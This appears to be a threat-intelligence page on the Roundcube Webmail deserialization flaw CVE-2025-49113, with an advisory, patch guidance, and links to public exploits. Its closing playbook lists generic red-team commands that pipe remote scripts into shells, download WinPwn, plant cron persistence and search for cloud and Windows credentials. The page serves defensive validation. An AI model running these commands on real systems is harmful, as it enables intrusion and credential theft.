CVE-2025-49113
Overview
This vulnerability is a PHP Object Deserialization flaw occurring in Roundcube Webmail's file upload handling component. The root cause is improper validation of the _from parameter in the URL processed by program/actions/settings/upload.php, which allows crafted serialized objects to be deserialized unsafely. The affected feature is the authenticated user settings upload functionality, where user-supplied input is deserialized without sufficient integrity checks.
Vulnerability Description
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
Impact
An attacker with valid authentication can execute arbitrary PHP code on the server, resulting in full system compromise. This includes the ability to execute shell commands, manipulate server files, and potentially pivot within the network. The prerequisite is possession of valid user credentials, which could be low-privileged accounts. The real-world consequence is a complete breach of the mail server environment, risking data exfiltration, service disruption, and lateral movement within the infrastructure.
Solution
Upgrade Roundcube Webmail to version 1.5.10 or later in the 1.5.x branch, or 1.6.11 or later in the 1.6.x branch as specified in the official Roundcube security advisory (https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10). Follow the vendor's release notes and patch instructions available on their GitHub repository (https://github.com/roundcube/roundcubemail/releases/tag/1.6.11) to ensure the vulnerability is fully mitigated.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roundcube Webmail arises from improper validation of the _from parameter in the upload.php script, which is part of the settings management functionality. This oversight allows authenticated users to manipulate the input, leading to PHP Object Deserialization. When the application processes untrusted data without adequate validation, it can result in the execution of arbitrary code. This flaw is particularly concerning as it can be exploited by users who already have access to the webmail system, thereby bypassing traditional perimeter defenses that are designed to protect against external threats.
Exploitation of this vulnerability can occur through various attack vectors. An authenticated user could craft a malicious request that includes a specially formatted _from parameter. Upon submission, the server would deserialize the object, executing any embedded code within the payload. This scenario is especially dangerous in multi-user environments where a compromised account can lead to widespread access and control over the webmail application. Attackers could leverage this capability to deploy malware, exfiltrate sensitive data, or pivot to other systems within the network, significantly increasing the potential damage.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Roundcube Webmail for communication and data management. Given the CVSS score of 8.8, the risk associated with this flaw is categorized as high, indicating that successful exploitation could lead to severe consequences. Businesses may face data breaches, loss of customer trust, and potential regulatory penalties if sensitive information is compromised. Furthermore, the ability to execute arbitrary code poses a direct threat to the integrity and availability of the webmail service, which could disrupt business operations and lead to financial losses.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating Roundcube Webmail to the latest versions is crucial, as subsequent releases have addressed this flaw. Implementing strict input validation and sanitization measures can help prevent similar vulnerabilities from being introduced in the future. Additionally, organizations should monitor user activity for any suspicious behavior, particularly focusing on authenticated sessions that exhibit unusual patterns. Employing web application firewalls (WAFs) can also provide an additional layer of security by filtering out malicious requests before they reach the application.
In conclusion, the vulnerability within Roundcube Webmail highlights the critical importance of secure coding practices and robust input validation mechanisms. As organizations increasingly rely on web-based applications for communication and data management, the potential for exploitation underscores the need for vigilance in maintaining software security. By understanding the nature of this vulnerability, its exploitation scenarios, and implementing effective detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their digital assets.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-49113, with our telemetry indicating a significant surge in detection activity involving this Roundcube Webmail vulnerability. This uptick coincides with the recent inclusion of the vulnerability in the Known Exploited Vulnerabilities (KEV) catalog, which may be driving increased adversary focus and scanning efforts. Although the overall exploit trend remains stable according to EPSS metrics, the qualitative increase in observed activity suggests that threat actors are intensifying reconnaissance and potential exploitation campaigns. Notably, multiple new proof-of-concept exploits have surfaced on public repositories, broadening the accessibility of attack tools to a wider range of actors, including less sophisticated adversaries. This expansion of exploit availability, combined with the vulnerability’s high severity and post-authentication remote code execution vector, elevates the risk posture for organizations running affected Roundcube versions. Consequently, defenders should consider this development as an indicator of growing adversarial interest and an increased likelihood of targeted attacks leveraging this flaw.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Roundcube Post-Auth RCE via PHP Object Deserialization
exploits/multi/http/roundcube_auth_rce_cve_2025_49113
|
Maksim Rogov, Kirill Firsov | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Roundcube 1.6.10 - Remote Code Execution (RCE) | Maksim Rogov | webapps | multiple | - | View |
GitHub PoCs (24)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fearsoff-org/CVE-2025-49113
|
fearsoff-org | 104 | 21 | 2025-06-04 | View |
|
hakaioffsec/CVE-2025-49113-exploit
Proof of Concept demonstrating Remote Code Execution through insecure deserialization in Roundcube (CVE-2025-49113).
|
hakaioffsec | 88 | 18 | 2025-06-06 | View |
|
00xCanelo/CVE-2025-49113
💥 Python Exploit for CVE-2025-49113 | Roundcube Webmail RCE via PHP Object Injection
|
00xCanelo | 7 | 6 | 2025-07-19 | View |
|
BiiTts/Roundcube-CVE-2025-49113
Proof-of-concept to CVE-2025-49113
|
BiiTts | 6 | 1 | 2025-06-10 | View |
|
rxerium/CVE-2025-49113
Detection for CVE-2025-49113
|
rxerium | 5 | 0 | 2025-06-03 | View |
|
rasool13x/exploit-CVE-2025-49113
|
rasool13x | 3 | 2 | 2025-06-05 | View |
|
Zwique/CVE-2025-49113
POC of CVE-2025-49113
|
Zwique | 4 | 0 | 2025-08-24 | View |
|
Ademking/CVE-2025-49113-nuclei-template
CVE-2025-49113 - Roundcube <= 1.6.10 Post-Auth RCE via PHP Object Deserialization
|
Ademking | 3 | 0 | 2025-06-04 | View |
|
SyFi/CVE-2025-49113
CVE-2025-49113 exploit
|
SyFi | 2 | 0 | 2025-06-06 | View |
|
Joelp03/CVE-2025-49113
|
Joelp03 | 1 | 1 | 2025-07-18 | View |
|
Yuri08loveElaina/CVE-2025-49113
Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the ...
|
Yuri08loveElaina | 1 | 0 | 2025-06-15 | View |
|
l4f2s4/CVE-2025-49113_exploit_cookies
CVE-2025-49113 - Roundcube Remote Code Execution
|
l4f2s4 | 1 | 0 | 2025-09-19 | View |
|
rippsec/CVE-2025-49113-Roundcube-RCE
CVE-2025-49113 – Roundcube ≤1.6.10 post-auth RCE via PHP object deserialization (HackTheBox CTF)
|
rippsec | 0 | 0 | 2026-04-16 | View |
|
mooder1/CVE-2025-49113
Roundcube Webmail post-auth RCE via PHP object deserialization (CVE-2025-49113)
|
mooder1 | 0 | 0 | 2026-04-11 | View |
|
AC8999/CVE-2025-49113
Python Script for CVE-2025-49113. Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution b...
|
AC8999 | 0 | 0 | 2025-08-29 | View |
|
LeakForge/CVE-2025-49113
Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization
|
LeakForge | 0 | 0 | 2025-08-30 | View |
|
Zuack55/Roundcube-1.6.10-Post-Auth-RCE-CVE-2025-49113-
|
Zuack55 | 0 | 0 | 2025-09-10 | View |
|
ankitpandey383/roundcube-cve-2025-49113-lab
Hands-on exploitation lab for Roundcube Webmail CVE-2025-49113 (authenticated PHP object deserialization → RCE) to read ...
|
ankitpandey383 | 0 | 0 | 2025-11-17 | View |
|
Evillm/CVE-2025-49113-PoC
|
Evillm | 0 | 0 | 2026-02-04 | View |
|
5kr1pt/Roundcube_CVE-2025-49113
Explicação + Lab no THM
|
5kr1pt | 0 | 0 | 2025-06-17 | View |
|
CyberQuestor-infosec/CVE-2025-49113-Roundcube_1.6.10
|
CyberQuestor-infosec | 0 | 0 | 2025-08-18 | View |
|
punitdarji/roundcube-cve-2025-49113
|
punitdarji | 0 | 0 | 2025-06-18 | View |
|
hackmelocal/CVE-2025-49113-Simulation
|
hackmelocal | 0 | 0 | 2025-07-11 | View |
|
SteamPunk424/CVE-2025-49113-Roundcube-RCE-PHP
This is a rewritten exploit to work with php
|
SteamPunk424 | 0 | 0 | 2025-08-19 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
43%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.